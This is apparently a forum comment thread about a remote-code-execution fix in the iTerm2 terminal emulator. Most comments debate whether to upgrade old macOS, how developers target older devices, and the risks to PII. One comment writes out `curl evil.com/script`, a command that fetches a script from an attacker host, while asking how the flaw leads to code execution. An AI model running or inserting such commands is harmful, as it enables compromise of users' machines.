I'm running 3.0.15 and it reports no updates available.
On MacOS 10.9 (upgrading isn't really an option right now, it would break too many things).
Is iTerm2 3.0.15 vulnerable?
I wouldn't worry so much about iTerm and would start working harder on those issues that are preventing you from updating.
However, I don't know of good answers to the issues that prevent me from updating.
For most of my work, Linux is used in VMs and remotely (Linux in a VM on a Macbook uses much less power than Linux running natively, and side-swiping between Linux and Mac is really great). But I don't use the Linux GUI much. My open windows are virtually all iTerm2 or Firefox, and almost everything that isn't a GUI is on a Linux command line somewhere.
So there isn't a strong imperative to update the host OS of my laptop.
However, what I lose from updating is significant. There are things that can't be done with much more recent MacOS, or which work significantly differently, or where the bugs have changed so introducing risks (SMBFS random file deletion, thanks Apple!). And Apple has a very annoying habit of making it next to impossible to build things for old devices on new Macs. (Unlike, say, Linux, where you can at least cross-compile or use chroot/containers to run old build systems.)
The real answer for the things I want to do is to buy a new machine and keep the old one around to support older devices that it is currently doing.
But I'm in the same dilemma as other people hoping for a great new Macbook Pro (after 2015) to come on the market at a sensible price some day. Besides, they have become very expensive, and my current one still works very well.
So in practice, I don't have much in the way of security risks (Firefox and Linux are updated after all), but iTerm2 is probably the only vulnerable tool I use daily on the Mac side which is exposed to data from the net.
And so it made sense to ask, just in case. I completely respect the author's reply.
If you're running a version that is not receiving security updates, you remain vulnerable to vulnerabilities discovered (perhaps in later versions using same code) after the updates have ceased.
It's a complicated pro-contra decision, but in Apple's case it's an easy decision. They have abandoned all developer good will some years ago already.
Running current versions is rarely advisable. Just see the gcc-9 disaster.
(I wouldn't run Linux on bare metal on a Macbook Pro though, because I already did some experiments and found it used less battery to run Linux under VMware Fusion, than to run the same Linux bare metal on the same machine. Counterintuitive perhaps. Maybe even wrong :-) but that's what I found at the time.)
If it ever dies, I might just get another one.
(I upgraded someone's MBP to Lion(?) and the graphic accelerated GUI elements of that version caused it to crash hard, often.
Turns out it had a desoldered GPU for which a recall was issued, but Apple still refused to fix it.)
3.0.15 is vulnerable.
1) The linked article says the fix is available in version 3.3.6. If it had been backported to previous release series, the article would say that.
2) You are running an old version of macOS that no longer gets security updates. It's a bit weird to be worried about an unpatched vulnerability in your terminal emulator when you are running an OS that (presumably) has several unpatched vulnerabilities itself. Your focus should be on figuring out how to safely upgrade to a supported version of macOS; after you do that, you'll be able to run the latest iTerm2 and the point is moot.
Weird example, as most of your users will be using a more recent version of macOS. So, while you're code isn't 'broken' for you, on your 6+ year old OS, it's broken for the vast majority of end users who will want to compile your code.
Of those, most are probably developing websites and webapps, and the only thing about the end user that matters is which browser, not which OS, let alone version.
But there are also developers writing apps that include older devices in their target. That means avoid the newest Mac tools because you can't compile for old enough targets on it.
Then there are Mac app developers that include older versions of the OS in their target market, and have to use older tools to ensure the target range is covered. This gets harder over time because Apple makes it deliberately hard.
Some of them even write mobile apps that target users of older devices. Shocking, I know, but there are a lot of users of older iOS devices these days, and sometimes you're tasked with making an app for them.
Then there are developers whose work talks to dev hardware attached to the computer, which needs drivers, which stop being supported at some OS version. The end users get a lump of hardware, and all the developer needs is an OS that can talk to the dev kit.
Then there are developers doing maintenance on older MacOS, iOS, or device firmware, and produce updates that are drop-in compatible to exactly the same set of target users as are already running the software. Not every consumer app will bother with this, but some business-critical things demand it.
I think the use case of "end users who will want to compile your code" is almost negligably small in comparison, and Linux is probably a better OS for doing that sort of thing anyway :-)
I've done all the above, on Mac, Windows, and Linux. VMs work great for Linux, and ok for Windows. Mac is a pain for this, because of Apple's policies to try to make it difficult.
And you can't port your NPM, React, etc. environment over to a new OS without breaking things?
> the only thing about the end user that matters is which browser
As a web dev, you want to use the latest ES/HTML/CSS specs while still targeting as many users as possible. How can you target modern users when the browsers on your 6-year old system isn't up-to-date enough to render what most users will see?
> Then there are Mac app developers that include older versions of the OS in their target market, and have to use older tools to ensure the target range is covered. This gets harder over time because Apple makes it deliberately hard.
This is a valid point. There are still people compiling on and for Windows XP and MS-DOS machines, after all. Hell, you can find hobbyists who only like writing Commodore 64 programs. Writing to target older platforms is hyper-niche and the computer you use to do that shouldn't be your main workstation.
> Shocking, I know, but there are a lot of users of older iOS devices these days, and sometimes you're tasked with making an app for them.
In which context? Given that 97% of devices are on iOS 11 or later (https://twitter.com/reneritchie/status/1159288325003460609), I can't imagine why you care about those users.
> Then there are developers whose work talks to dev hardware attached to the computer, which needs drivers, which stop being supported at some OS version. The end users get a lump of hardware, and all the developer needs is an OS that can talk to the dev kit.
This is a valid point.
> Then there are developers doing maintenance on older MacOS, iOS, or device firmware, and produce updates that are drop-in compatible to exactly the same set of target users as are already running the software. Not every consumer app will bother with this, but some business-critical things demand it.
A valid point as well - this is exactly the context in which COBOL is still used.
> I think the use case of "end users who will want to compile your code" is almost negligably small in comparison, and Linux is probably a better OS for doing that sort of thing anyway :-)
That's...not true. macOS developers exist, you know, and there's a reason that Macs ship with a strong tooling kit.
Besides, if you distribute dynamically-linked binaries, you want an up-to-date OS so that the dylibs you're linking to actually exist...
Just some thoughts from a junior dev :)
You can run latest browsers just fine. I'm talking to you now through Firefox Beta that was released a couple of days ago, on my 6 years old OS. It works just great, latest ES/HTML/CSS specs and all, same as yours. It's more up to date than my phone!
However, if you're serious about testing, portability, accessibility, inclusion, quality, and just looking good to a worldwide audience for your site or app, then you won't rely on testing in a single browser on your own machine.
Especially if your own machine is running the latest bleeding-edge version (as mine is). You may be using something like Selenium, BrowserStack, Sauce Labs etc. with a testing pipeline. Or (as I do), a bunch of browsers in cloud-based VMs.
Even if it's just a manual testing pipeline, there are so many ways a complex web app can render or behave differently on different browsers it's not funny, so well worth testing complex things.
Imagine trying to write something like a mini Google Sheets or Docs without testing on different browsers, while intending for it to be usable to a wide audience. It would break in more ways than you could imagine from testing only on the latest browser on your own machine.
> Given that 97% of devices are on iOS 11 or later [...] I can't imagine why you care about those users.
Not all apps are for consumers.
And not all apps are for distribution on an app store.
And some on a store are for particular audiences. For example government apps, financial services apps targetting people with little cash, and those running on fleets of purchased devices in a business (such as tablets) for a dedicated purpose.
E.g. one of those I've dealt with was effectively a museum full of tablets fixed in place. Nodody's going to purchase new hardware in quantity if the old ones are working fine, just to please a developer who can't figure out how to built for an old target. (When I did that job, it wasn't iOS, but the same principle applies.)
> A valid point as well - this is exactly the context in which COBOL is still used.
I wonder if you're trying to suggest "really really old" with COBOL :-) The same maintenance issues apply to maintaining apps released just a couple of years ago, which supported 5 year old devices at the time they were released, and so aim to maintain the same until they have a major version change.
(Especially business apps rolled out on a fleet of purchased devices, where continuity is a requirement. But also, consumer apps if you care about the customers.)
> macOS developers exist, you know
I do know, where do you think this thread came from :-)
But the vast majority of shipped code is not open source, and when it is, most of it is used only on servers or inside devices.
If all parties are ok with that trade off I'd say don't worry about this iterm update and also don't do anything involving PII on that computer.
The principle of their risk vs their cost doesn't work in this case. Terminals vulnerabilities are a bit more serious: It means don't anything involving PII on any remote computer either, from "that computer".
(If you take that seriously, that means don't access email too.)
Haha, "employee machines", chuckles :-) I haven't had (or been offered) one of those in many years - except for cloud machines. Plenty of cloud machines, but I'm nearly always expected to use my own devices to access them, at my own cost.
I do work with PII, for a variety of companies. About a quarter of the work I do involves direct use of PII, and another third interacts with it indirectly (such as grepping operational logs), so it has to be treated as pervasive.
The non-profits I currently handle PII for do not have spare cash to buy new kit at this level, or pay for my time fiddling around. It's not so much that they don't value it. I value it after all, and I'm responsible for deciding how to handle it. So another solution will need to be found.
For-profits I handle PII for (as a freelance/consultant) can of course afford machines, but it's still a problem to go cap in hand, when the expectation is that bringing an adequate terminal is my problem not theirs.
Which is fine, it's just how things are done.
Meanwhile, I still have physical devices that need an older MacOS for other work.
And there's a problem with serious MacOS SMBFS bugs that change on each version - and have themselves caused PII issues, for real (google "delete random files once in a blue moon"). I'm not looking forward to wierdness like that all over again, and I know that later MacOS has new SMBFS bugs.
So, upgrading MacOS, sadly, has known data access risks too. It's not something I should do casually, nor treat it as an unambiguous improvement from a security-of-data perspective.
To a responsible person, this combination of requirements sucks. I will deal with it responsibly of course, somehow.
But there's no quick and straightforward answer that meets all the requirements, and contrary to what I think some are saying, "just update" does not meet them, nor is it an unambiguous improvement.
I'm not sure I understand the distinction. If someone's taken control of your computer then it doesn't matter if the terminal emulator you run on it is perfect or not.
The attacker would only need to periodically screenshot your display, or dump RAM from specific processes, or something like that.
When the GP said don't use that computer for handling PII, I thought of PII on the machine itself (e.g. local files). That might have been a misunderstanding, and my response mixed up two ideas in an unclear way:
1. The terminal with a vulnerability is likely to be the attack vector for compromising that computer in the first place, because the terminal receives output from basically everything in your fleet, and all the data you interact with, if your work is command line heavy. The more data you handle through that one machine and terminal (including PII, which can be a source of unsanitised data), the more likely the compromise is to find a way.
2. Handling PII that resides on other machines is also compromised by the terminal problem on the local machine.
Anyway, the author answered really helpfully, for which I'm grateful.
I finally got around to installing iTerm2 this year. It's great, thanks to you (and to all contributors) for all your hard work! I will say, though, that while features like shell integration sound powerful, I personally choose to keep them disabled in order to minimize attack surface. It would be nice to be able to disable tmux integration as well for the same reason, given I don't use tmux.
I updated a machine i am partially responsible for that was two patch versions behind and at first it only updated to the one previous to this patch. It strikes me that the update check should always go to the most recent version, no? I actually don't know what the normal behavior is here, I was just quite surprised that i had to do the update process twice.
What's stopping an attacker from looking at the definitions here: https://github.com/gnachman/iTerm2/commit/538d570ea54614d3a2... and using the same `NSUTF8StringEncoding` to build the same attacks?
EDIT: Of course GitHub doesn't follow fragment ids when they are part of a large diff, but you can open up `sources/TmuxController.m` yourself.
I looked through https://github.com/gnachman/iTerm2/commit/538d570ea54614d3a2... which appears to do some changing of how tmux variables are hanlded/stored.
Is the vulnerability that tmux session variable names and other session values are untrusted user input?
How does a general command like `curl evil.com/script` turn into an RCE here?
I'm curious about the timing of the MOSS announcement being concurrent with the patch version: what's the rationale for that, versus (eg) waiting until some/more users had upgraded to a fixed version?
(Thanks for your work, amazing application)
Edit: Looking at the parent of that commit, I'd say no.
In any case, thanks for your contributions with a tool that is obviously so useful to so many. I almost never use macOS, but I do own a 2015 MBP from some development I needed it for in the past. Next time I boot it up, you can be sure I will be installing iTerm2. (I might actually have it and just not remember, but I don't think so, I never invested too much into the platform.)
Make sure that after reinstallation you're at v3.3.6+
Impressive work, gnachman.
If that's you, and you're not already a contributor to the continued development of this software, then today is a great day to start!
There's a Patreon, so for many people it'll be very easy to begin helping out:
(I have no affiliation with iTerm2 or it's author; I just want to encourage people to support important software)
I don't know an easy way to do it in Terminal.app
I had no idea George had a Patreon, definitely putting a few bucks there!
or in vi, !pbcopy
Also, GNU screen: https://stackoverflow.com/questions/16111548/how-to-copy-the...
Quick work around: there is a shortcut for hiding all other views .
The essential ones for me are, remapping modifiers and setting the right or left Option key to Meta, Terminal.app only lets you set both or none to Meta.
FFM is used when you have overlapping windows and want to focus a window without raising it.
(I don't want overlapping windows for anything, never have, and am still sad I can't get OS-wide FFM on a mac.)
Sounds like an interesting idea to implement. Have you dug into the tmux bug tracker to check if someone already tried?
Because that's the only way your comment makes sense to me.